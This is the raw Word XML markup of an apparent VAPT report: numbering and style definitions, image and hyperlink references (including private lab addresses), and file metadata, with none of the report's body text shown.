                            <w:t>VAPT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8E000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69.4pt;margin-top:34.85pt;width:56.6pt;height:15.3pt;z-index:-1595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1gPkwEAABoDAAAOAAAAZHJzL2Uyb0RvYy54bWysUsGO0zAQvSPxD5bv1E1BUKKmK2AFQlrB&#10;Sst+gOvYTUTsMTNuk/49Y2/aIrituNhjz/jNe2+8uZn8II4WqYfQyGqxlMIGA20f9o18/PH51VoK&#10;Sjq0eoBgG3myJG+2L19sxljbFXQwtBYFgwSqx9jILqVYK0Wms17TAqINnHSAXic+4l61qEdG94Na&#10;LZdv1QjYRgRjifj29ikptwXfOWvSd+fIJjE0krmlsmJZd3lV242u96hj15uZhn4GC6/7wE0vULc6&#10;aXHA/h8o3xsEApcWBrwC53pjiwZWUy3/UvPQ6WiLFjaH4sUm+n+w5tvxId6jSNNHmHiARQTFOzA/&#10;ib1RY6R6rsmeUk1cnYVODn3eWYLgh+zt6eKnnZIwfPmuWq9XnDGcqt6/eV0Vv9X1cURKXyx4kYNG&#10;Io+rENDHO0q5va7PJTOXp/aZSJp2E5fkcAftiTWMPMZG0q+DRivF8DWwT3nm5wDPwe4cYBo+QfkZ&#10;WUqAD4cEri+dr7hzZx5AITR/ljzhP8+l6vqlt78BAAD//wMAUEsDBBQABgAIAAAAIQAb4jJW3wAA&#10;AAoBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqE2rhjbEqSoEJ6SKNBw4OvE2&#10;iRqvQ+y24e/ZnuC42qeZN9lmcr044xg6TxoeZwoEUu1tR42Gz/LtYQUiREPW9J5Qww8G2OS3N5lJ&#10;rb9Qged9bASHUEiNhjbGIZUy1C06E2Z+QOLfwY/ORD7HRtrRXDjc9XKuVCKd6YgbWjPgS4v1cX9y&#10;GrZfVLx237vqozgUXVmuFb0nR63v76btM4iIU/yD4arP6pCzU+VPZIPoNSwXK1aPGpL1EwgGkuWc&#10;x1VMKrUAmWfy/4T8FwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsA&#10;AAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFYrWA+TAQAAGgMAAA4A&#10;AAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABviMlbfAAAACgEA&#10;AA8AAAAAAAAAAAAAAAAA7QMAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAD5BAAAAAA=&#10;" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="2C6975C0" w14:textId="0320AE91" w:rsidR="002D34AF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9"/>
                      </w:rPr>
                      <w:t>VAPT</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-3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790D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83BC5D70"/>
    <w:lvl w:ilvl="0" w:tplc="EB28DC4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="306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DC8793C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="589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374684C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1555" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BD32D8DA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2530" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AA0AC67C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3505" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0A1051D8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4480" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5A40C0DA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5455" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="008A1BE6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6430" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="998E5F1A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7406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3D41150D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D94375C"/>
    <w:lvl w:ilvl="0" w:tplc="11E4D5AC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="&gt;"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="503" w:hanging="19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DE6DC46">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1385" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="225A1F00">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2271" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B574B43A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3156" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B4D288E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4042" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2406636C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4928" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A7AABECE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5813" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9CC8506C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6699" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C5CA4CBC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7585" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="542723DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF4C7E5A"/>
    <w:lvl w:ilvl="0" w:tplc="B46ABF66">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="&gt;"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1449" w:hanging="19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5CADD8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2231" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E6EA51DA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3023" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9CBA2BA8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3814" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4BE87110">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4606" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D212772C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5398" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="57F0F12E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6189" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="18C0074C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6981" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5E12326E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7773" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="776248B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C120596"/>
    <w:lvl w:ilvl="0" w:tplc="B02E7D2C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="&gt;"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="306" w:hanging="19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9EFD8E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1205" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FC563190">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2111" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B5948656">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3016" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2F16B2BE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3922" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B57E1302">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4828" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="85A2193A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5733" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="173008C0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6639" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0D66743E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7545" w:hanging="197"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1185483775">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1599561048">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="770778220">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1693192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34AF"/>
    <w:rsid w:val="002D34AF"/>
    <w:rsid w:val="0070439E"/>
    <w:rsid w:val="00886BD9"/>
    <w:rsid w:val="00C9238A"/>
    <w:rsid w:val="00D44D6C"/>
    <w:rsid w:val="00D96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5C369D"/>
  <w15:docId w15:val="{A84354E6-A00E-4605-99E7-D0FB024D7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06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D6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06" w:hanging="196"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="39"/>
      <w:ind w:left="141"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D44D6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4D6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44D6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4D6C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D6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D44D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36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6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8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2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03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9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image" Target="media/image14.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpe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image" Target="media/image17.jpeg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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hyperlink" Target="http://192.168.0.168:8009/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpeg"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpe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hyperlink" Target="http://192.168.0.168:8180/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19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jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.0.168/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme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hyperlink" Target="http://anthonyvance.com/files/YG4pZaaE.txt" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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CACF3D-1E8F-4A72-8976-53428A30A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1566</Words>
  <Characters>8932</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>74</Lines>
  <Paragraphs>20</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10478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Aditi Gupta</dc:creator>
  <cp:lastModifiedBy>Khush Choudhary</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-30T14:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-30T14:09:00Z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2025-04-30T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Producer">
    <vt:lpwstr>Microsoft® Word 2019</vt:lpwstr>
  </property>
</Properties>
</file>